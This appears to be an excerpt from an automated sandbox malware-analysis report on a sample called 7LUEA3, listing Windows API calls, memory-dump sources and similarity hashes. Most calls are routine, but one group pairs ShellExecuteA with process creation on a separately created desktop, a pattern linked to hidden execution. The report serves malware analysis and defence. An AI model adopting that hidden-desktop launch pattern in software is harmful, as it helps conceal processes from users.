                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,01547588,?,?,00000000), ref: 01547539
                                                                                                                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000C43D,00000000,00000000,00000004), ref: 01547544
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,01547588,?,?,00000000), ref: 01547562
                                                                                                                                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000C479,00000000,00000000,00000003), ref: 0154756D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4102113445-0
                                                                                                                                                                                                                                • Opcode ID: 33cb5045ee57effc72adce7204b1e353fd3fccd918420f9200369d7de67a4f4b
                                                                                                                                                                                                                                • Instruction ID: b88ea70fa0d4c67a143bf5d7a4535471b4b17251f881aeb2f32057d4da7e57a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33cb5045ee57effc72adce7204b1e353fd3fccd918420f9200369d7de67a4f4b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E0126312042577BE712AAB4DC12FAA769CFB9D71CFA10664F514DE7C0DB34AE0045A0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,0154776B,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 015475D0
                                                                                                                                                                                                                                  • Part of subcall function 01547269: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 01547287
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Locale$InfoThread
                                                                                                                                                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                                • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                                • Opcode ID: db83da15a3fa34b45cd54209b620a0defb6d77cf2236c2f5f2df05e05bb2e96a
                                                                                                                                                                                                                                • Instruction ID: 4290fd8cf8135f21b4d20b519fac9d56014b0684996ed953bd14e30a2065919e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db83da15a3fa34b45cd54209b620a0defb6d77cf2236c2f5f2df05e05bb2e96a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E041B1353045074B9B11EABC88903BEB7EAFBDC10CBA44C25D596CF345EB34E9069261
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,01558380,0000001C,?,015579C5,0000001C), ref: 01557964
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 01557971
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: VirtualQueryEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-930368515
                                                                                                                                                                                                                                • Opcode ID: 388e721c0927c77e120657df2e7ea03328410ba04d50bcdfb180f3029f5b791b
                                                                                                                                                                                                                                • Instruction ID: f690cc78018bbfedab23eda4affef857003deb5d9f9eee66e1617ec2ef0dce1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 388e721c0927c77e120657df2e7ea03328410ba04d50bcdfb180f3029f5b791b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26E092726086167AA310A6E99C41CAFBBBCDFDE570BA0431ABA2897191D7604D0182B4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,01558380,0000001C,?,015579C5,0000001C), ref: 01557964
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 01557971
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: VirtualQueryEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-930368515
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,01549846,00000000,01549859), ref: 01548EC3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 01548ED4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0154AD78
                                                                                                                                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0154AD94
                                                                                                                                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0154AE0B
                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0154AE34
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 920484758-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 015477F1
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 01547815
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 01547830
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 015478D4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 015477F1
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 01547815
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00840000,?,00000105), ref: 01547830
                                                                                                                                                                                                                                • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 015478D4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3990497365-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 015489E7
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32 ref: 01548917
                                                                                                                                                                                                                                  • Part of subcall function 01548875: GetCPInfo.KERNEL32(00000000,?), ref: 0154888E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1505017576-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(0155C445), ref: 0153E984
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0155C445), ref: 0153E997
                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0153EA35), ref: 0153E9C1
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0155C445), ref: 0153EA2F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 730355536-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(0155C445), ref: 0153E984
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0155C445), ref: 0153E997
                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0153EA35), ref: 0153E9C1
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0155C445), ref: 0153EA2F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 730355536-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(?,?), ref: 0154488A
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 01544893
                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?), ref: 015448A9
                                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 015448B8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2103556486-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,015460BF), ref: 01546067
                                                                                                                                                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,015460BF), ref: 0154606D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                                • String ID: yyyy
                                                                                                                                                                                                                                • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000), ref: 01556774
                                                                                                                                                                                                                                  • Part of subcall function 015564D9: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 015565A3
                                                                                                                                                                                                                                  • Part of subcall function 015564D9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,015566D2), ref: 015565E4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Create$DesktopExecuteProcessShell
                                                                                                                                                                                                                                • String ID: .exe$OPEN
                                                                                                                                                                                                                                • API String ID: 1246678638-879745837
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000003.1628598878.0000000009C3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 09C3C000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_3_9c3c000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: -$-$.$e
                                                                                                                                                                                                                                • API String ID: 0-1205406789